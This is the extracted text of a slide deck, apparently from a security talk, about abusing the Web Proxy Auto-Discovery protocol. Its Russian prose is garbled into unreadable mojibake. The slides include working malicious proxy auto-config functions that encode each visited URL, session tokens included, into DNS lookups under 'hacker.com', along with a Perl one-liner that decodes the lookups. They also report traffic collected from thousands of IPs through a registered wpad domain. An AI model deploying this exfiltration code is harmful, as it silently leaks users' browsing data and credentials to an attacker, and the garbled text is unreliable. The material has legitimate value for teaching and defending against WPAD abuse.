Embed Size (px)
Citation preview
WPADÌàêñèì Àíäðååâ, ïðîãðàììèñò áýêåíäà Îáëàêî Mail.Ru
Web Proxy Auto Discovery Protocol
Proxy Auto-Con�g �le
function FindProxyForURL(url, host) {
if (host == "mail.ru") {
return "PROXY mp.example.com:8080";
} else
if (host == "google.com") {
return "PROXY gp.example.com:5050";
} else {
return "DIRECT";
}
}
Äîìåí êëèåíòà - msk.o�ce.work
Windows XP Pro SP3:
1. http://wpad.msk.office.work/wpad.dat (DNS)
2. http://wpad.office.work/wpad.dat (DNS)
Windows 7 Pro SP1:
1. http://wpad.msk.office.work/wpad.dat (DNS)
2. http://wpad/wpad.dat (LLMNR)
3. http://wpad/wpad.dat (NBNS)
Ñêîëüêî ñåé÷àñ äîìåíîâ 1 óðîâíÿ (com, ru, net, ...)?
861
Ñêîëüêî ñåé÷àñ äîìåíîâ 1 óðîâíÿ (com, ru, net, ...)?
861
wpad.work
3901 óíèêàëüíûõ IP çà 11 äíåé
http
https
isResolvable
Attempts to resolve a hostname to an IP address and returns true if
successful.
// If the host requested can be resolved by DNS,
// send via proxy1.example.com.
if (isResolvable(host))
return "PROXY proxy1.example.com:8080";
Ïåðåäàäèì äàííûå ÷åðåç DNS!
function FindProxyForURL(url, host) {
var d = url.replace(/[^a-z0-9]+/g, '.') + ".xxx.ru";
return isResolvable(d) ? "DIRECT" : "DIRECT";
}
https://example.ru/?token=123
⇓https.example.ru.token.123.xxx.ru
function encode(str) {
r = str.toLowerCase()
.replace(/([^a-z1-9])/g, function(m) {
return "0" + m.charCodeAt(0)
})
.replace(/([^\.]{60})(.)/g, '$1.$2')
.substr(0, 240);
return r + (r.slice(-1) != "." ? "." : "") + "hacker.com";
}
function FindProxyForURL(url, host) {
var u = encode(url);
return isResolvable(u) ? "DIRECT" : "DIRECT";
}
https://example.ru/?token=123
⇓https058047047example046ru047063token061123.hacker.com
⇓
echo 'https058047047example046ru047063token061123.hacker.com' \
| perl -lape 's/\.hacker\.com$//; s/\.//g; s/0(..)/chr($1)/eg;'
⇓https://example.ru/?token=123
Ïðîòîêîëû
53% https
46% http
0.15% ws
0.08% wss
Ñòðàíû
14% Ðîññèÿ
11% ÑØÀ
9% Êèòàé
7% Èíäèÿ
×òî â èòîãå?
×òî äåëàòü?
